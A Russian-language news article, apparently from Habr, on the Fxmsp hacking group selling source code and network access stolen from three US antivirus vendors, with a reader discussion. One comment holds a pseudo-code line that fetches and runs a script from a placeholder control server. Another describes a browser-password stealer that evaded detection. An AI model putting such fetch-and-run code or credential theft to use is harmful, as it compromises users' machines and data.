Хакеры продают исходники трёх антивирусов: код агентов и модули аналитики, основанные на машинном обучении



    Вчера специалисты по безопасности из компании Advanced Intelligence (AdvIntel) опубликовали отчёт о действиях хакерской группировки Fxmsp, которая выставила на продажу исходный код трёх антивирусных продуктов. Исходники включают в себя:

    • код антивирусных агентов;
    • модули аналитики, основанные на машинном обучении;
    • «плагины безопасности» для браузеров.

    Fxmsp — хакерский коллектив, работающий в различных русско- и англоязычных подпольных сообществах с 2017 года. Они атакуют корпоративные и правительственные сети по всему миру, пишет AdvIntel. Например, 5 апреля 2018 года они выставили на продажу доступ к скомпрометированной сети отелей Marriott/Starwood.

    На протяжении 2017 и 2018 годов Fxmsp создала сеть доверенных реселлеров для продвижения своих «продуктов» в криминальном подполье. Среди них доступ к сетевым окружениям через внешние RDP-серверы и открытые Active Directory взломанных компаний.

    Совсем недавно группировка заявила о разработке ботнета для кражи учётных данных, который способен поражать крупные компании путём «эксфильтрации имён пользователей и паролей». Fxmsp утверждала, что их главная цель — развитие этого ботнета и улучшение его возможностей для кражи информации из защищённых систем.


    Cложные методы работы Fxmsp. Схема составлена компанией AdvIntel

    Вернёмся к взлому антивирусных компаний. 24 апреля 2019 года Fxmsp заявила, что у неё есть доступ в защищённые сети трёх ведущих американских антивирусных компаний. По словам хакерского коллектива, они неустанно работали в течение первого квартала 2019 года, чтобы взломать эти компании и, наконец, преуспели, получив доступ к их внутренним сетям.

    Коллектив скопировал из внутренних сетей перечисленные компоненты антивирусного программного обеспечения: код антивирусных агентов, модули аналитики, «плагины безопасности» для браузеров.

    Сейчас исходный код и сетевой доступ к компаниям продаётся за $300 тыс.

    На подпольных форумах Fxmsp также прокомментировала возможности программного обеспечения различных компаний и оценила их эффективность.

    Коллектив предоставил перечень конкретных показателей, с помощью которых можно идентифицировать компанию, даже если продавец не раскрывает её название. Это скриншоты папок, предположительно содержащих 30 терабайт данных, которые были скопированы. Папки, похоже, содержат информацию о документации по разработкам компаний, моделям искусственного интеллекта, программном обеспечении веб-безопасности и базовый код антивирусного программного обеспечения.

    AdvIntel пишет, что группировка специально выбрала антивирусные компании в качестве мишеней. Судя по всему, они нацеленно работали над этим проектом с октября 2018 года до апреля 2019 года. Это совпадает с периодом их исчезновения с форумов. Сами представители Fxmsp сказали, что работали над проектом шесть месяцев, что тоже совпадает с обозначенным периодом времени.

    По словам известного в хакерских кругах товарища ShadowRunTeam, который сейчас работает на Telegram, за группой Fxmsp стоит житель Москвы по имени Андрей, который начал заниматься киберпреступностью в середине 2000 года и специализируется на социальной инженерии.

    AdvIntel также ссылается на других экспертов, которые «с большой уверенностью оценивают, что Fxmsp является надёжным хакерским коллективом, который имеет историю продажи поддающихся проверке корпоративных взломов, на которых они заработали около $1 млн». AdvIntel предупредила правоохранительные органы США относительно предполагаемого взлома.

    Директор по исследованиям AdvIntel Елисей Богуславский в комментарии Ars Technica сказал, что в октябре 2018 года у Fxmsp был конфликт с их реселлером (прокси), и эти отношения были скомпрометированы. Поскольку прокси контролировал учётные записи Fmsp на различных форумах, через которые группа обычно продавала свои данные, это заставило Fxmsp переместить все свои сообщения в Jabber. Богуславский сказал, что Fxmsp была одной из двух групп, которые организовали атаку на AV-компании. Но их партнёры скомпрометировали одну точку доступа при навигации по клиентскому каталогу жертвы, так что пришлось потом восстанавливать доступ. Возможно, это нарушило первоначальные планы по продаже данных. «По их словам, они планировали предложить доступ к некоторым компаниям в середине мая, — сказал Богуславский, — скорее всего, на форумах (однако это не точно: они использовали термин „сделать публичную продажу”)». Но из-за скомпрометированной точки доступа, отметил он, теперь группа планирует продавать непублично, то есть делая приватные предложения заинтересованным лицам. Также есть вероятность, что до конца текущего месяца на форумах начнётся и публичная продажа исходников.

    Возможно, в конце концов исходные коды антивирусов попадут и в открытый доступ.
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 34

    • НЛО прилетело и опубликовало эту надпись здесь
        –1
        Открытые(и даже проверенные спецслужбами) исходники — не гарант безопасности, как показывает опыт Касперского. Никто не мешает написать антивирус вида
        int main(void) {
        run(download_script("http://mycontrolserv.io"));
        return 0;
        }
        • НЛО прилетело и опубликовало эту надпись здесь
            +1
            Статический анализ в моем коде выше не покажет ничего противозаконного.
            Я к тому, что в любом мало-мальски большом антивирусе есть функция «выполнить код на удаленной машине».
              +4
              Вы неверно выразились. Не «никто не мешает», а «большинство антивирусов так и написаны».

              Работа со сложными вирусами (детектирование, лечение) — по сути, исполняемые скрипты, и тут нельзя по-другому. А эти скрипты скачиваются с обновлениями баз. И запретить обновления нельзя — какой толк от антивируса без обновлений. Можно вручную проверять каждое обновление (и требовать исходники баз в человеко-читаемом виде), но это уже другая история.
                0
                проверять каждое обновление

                Ну теоретически обновления для версий, сертифицированных под ФСБ, такие и есть
          +1
          Ну так себе идея. Невзирая на зашкварность прнципа security via obscurity, антивирусы — это игра в кошки-мышки, и именно здесь он может работать. И давая возможность разработчикам вирусни читать исходники антивирусов, надо прикладывать на порядки больше усилий, чтобы антивирус все равно продолжил работать
          • НЛО прилетело и опубликовало эту надпись здесь
              +11

              Закон то как раз известен. Продолжая вашу логику, следует выложить в открытый доступ информацию о том, от каких информаторов ФСБ узнаёт о готовящихся терактах. Предлагаю не доводить логику до крайностей, и остановиться на золотой середине, которая более-менее эфективна.

                +1
                Del. Пока писал, Arqwer сформулировал мысль лучше меня)
              0
              исходники антивирусов обязательно должны быть открыты, чтобы их перестали подозревать в троянизме.

              А почему это не касается любого другого софта, что вы устанавливаете на свой компьютер?
              • НЛО прилетело и опубликовало эту надпись здесь
                  +5

                  Смотря где. В Виндоуз, действительно, есть практика использования "портабельных" приложений, но в Линукс типично установка производится только из-под рута. Возьмите сторонние пакеты популярных коммерческих приложений, например: skype, slack, vs code. Их дебиан-пакеты при установке прописывают в систему свой ключ и свой репозиторий. Это значит, что с этого момента компании могут обновить любой файл в вашей системе, например, они могут "обновить" вам sshd, firefox, bash или любую другую стандартную программу. Более того, slack еще и прописывает в крон скрипт, который проверяет ежесуточно, что их репозиторий в /etc/apt/source.list.d/ не закомментирован, и раскомментирует его в этом случае обратно (по комментариям в коде, это делается на случай обновления дистрибутива).


                  Потому в Линукс, если вы ставите что-то стороннее, коммерческое, проприетарное, из-под рута, вы по сути даете компании полный рутовый доступ в вашу систему. То же касается докеров и прочих популярных сторонних утилит.

                  • НЛО прилетело и опубликовало эту надпись здесь
                      +2
                      Ну чисто теоретически они могут выпустить обновление своего vscode, где заодно «обновлят» bash. На самом деле пакетный менеджер укажет вам о конфликте и не даст поступить так нагло.

                      Но это легко обходится добавлением новой задачи/правила в systemd, crond, udevd и еще много куда.
                        0

                        Если речь о стороннем репозитории, то можно просто положить в него пакет bash версии 9999 и Линукс радостно на него "обновится". Такие случаи регулярно происходят и без злого умысла.

                        +3
                        Каком ключе? Ключ только позволяет убедится что MITM не было, никакой подписи бинарей нет (как минимум в pacman/yum(dnf)/apt). Ставят Obsoletes: Bash в своем spec-file (PKGBUILD, whatever) и понеслась.
                        +4
                        Вы можете отказаться разрешать им прописывать свой репозиторий. Это делается только для своевременности обновлений. Без репозитория они всё равно продолжат работать.
                        Умея пользоваться менеджером пакетов на уровне выше чайника, можно установить пакет в chroot и пусть он там обновляется как хочет.
                        Но главное, что все эти системы пакетов — предназначены для доверенного софта. Для недоверенного их использование давно устарело. Используя Flatpak вы можете установить любое из перечисленных приложений, полностью отобрать у него доступ к системе даже на чтение (перед первым запуском, к тому же), и оно всё равно продолжит работать и обновлятся.
                        По сранению с этим, в Windows большиство приложений вы не сможете запустить, не запустив перед этим от рута его инсталлятор. Никакие Sandbox в Windows не могут Sandbox-ить инсталлятор, потому что в формате MSI сам инсталлятор не делает процедуры, вместо этого делегируя их системному процессу.
                          0

                          Какую кнопку надо нажать, чтобы отказаться им разрешать обновления? Это надо вручную после установки .deb удалять крон-скрипты и файл в /etc/apt/sources.list.d/, причем при переустановке или перепроверке он прилетит обратно.


                          В Линуксе пока все плохо с установкой стороннего ПО: она там просто-напросто не предусмотрена, потому и делают такие костыли, как самовольное добавление себя в конфиг apt. Я знаю, что там делают appimage, snapcraft и flatpack, но они, конечно, поздновато спохватились: Линукс уже более 20 лет существует, а средства для распространения приложений только-только начинают делать. Но, конечно, хорошо, что вообще делают.


                          Умея пользоваться менеджером пакетов на уровне выше чайника, можно установить пакет в chroot и пусть он там обновляется как хочет.

                          Для этого придется заморочиться с разными конфигами, писать свои скрипты, это не штатная возможность.


                          По сранению с этим, в Windows большиство приложений вы не сможете запустить, не запустив перед этим от рута его инсталлятор.

                          В Windows есть портабельные приложения в виде архивов, и часто установщик можно распаковать, а изоляцию бедного человека можно реализовать, запуская приложение из-под отдельного пользователя (при этом ломается драг-н-дроп, права на файлы и тд).

                            +1

                            dpkg -i --force-not-root --root=/path/to/temp package.deb
                            Установить в промежуточную папку, удалить всё ненужное, всё остальное копировать в систему. К сожалению, напрямую из промежуточной папки оно не заработает, потому что всем плевать и они пишут абсолютные пути к ресурсам. При обновлении оно не слетит, потому что само оно не обновится.
                            Портабельные приложения существуют, но они почти всегда пиратские. А мы же с вами белые и пушистые.

                    +1
                    У этого подхода ведь есть и обратная сторона медали. С одной стороны, опенсурс позволяет всем желающим провести аудит кода, найти и устранить уязвимости. С другой стороны, опенсурс также позволяет всем желающим найти уязвимости, и никому про это не сказать, а продолжать их использовать в своих целях. И в случае антивируса, я не могу быть уверенным, что волонтеры будут удачливее, чем злоумышленники, особенно учитывая тот факт, что в отличии от проектов уровня ядра Линукса группа первых будет сравнительно невелика, а группа вторых ничуть не меньше, и весьма мотивирована.
                    • НЛО прилетело и опубликовало эту надпись здесь
                    +10

                    Эта статья — неплохая реклама хакерской группы. Написана по всем канонам. У меня, как у читателя, появилось чувство доверия и уважения к этому коллективу.

                    • НЛО прилетело и опубликовало эту надпись здесь
                      +1
                      «с большой уверенностью оценивают, что Fxmsp является надёжным хакерским коллективом, который имеет историю продажи поддающихся проверке корпоративных взломов, на которых они заработали около $1 млн».


                      Это же годы. Для коллектива и на годы, да еще плюс комиссии большие за анонимную обналичку/выведение денег — это очень мало.
                        0
                        Наверняка коллектив зарабатывает не только на таких продажах, это скорее для маркетинговая поддержка основных проектов.
                      • НЛО прилетело и опубликовало эту надпись здесь
                          +7

                          Не обнаружил наименований продуктов. Вода.

                            0
                            Скорее всего одна из трех компаний — Симантик. А вот другие… Ну нет еще двух известных американских компаний. Каспер — вряд-ли, так как вроде русский хакал. Есет топовая компания, но не американская. Тренды тоже не американские. Макафи? Но кто тогда третий?
                            +1
                            Прямо не сказано, но из текста можно понять, что взломщики намеренно не раскрывают наименования продуктов.
                              +2
                              Скорее всего для этих антивирусов это будет их первое упоминание в сети…
                                0
                                Какая-нибудь Panda… Не в обиду компании, но году в 2015 я подписал заведомый вирус (Conficker, он же Kido, она же Элла Кацнельбоген, она же Людмила Огуренкова, она же Изольда Меньшова, она же Валентина Панеяд), который детектировался «Пандой» по сигнатуре, просроченной и отозванной цифровой подписью. И чудо — файл перестал определяться, хотя любой нормальный продукт должен приравнивать отозванную подпись, как минимум, к отсутствию подписи.
                                  0

                                  Я написал скрипт, который просто берёт из браузера историю и пароли и отправляет их на сервер, а затем самоудаляется. ESET заворчал. Я удалил из скрипта самоудаление. У ESET пропали все претензии.

                              0
                              На подпольных форумах Fxmsp также прокомментировала возможности программного обеспечения различных компаний и оценила их эффективность.

                              Самое интересное не опубликовали!

                              Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                              Самое читаемое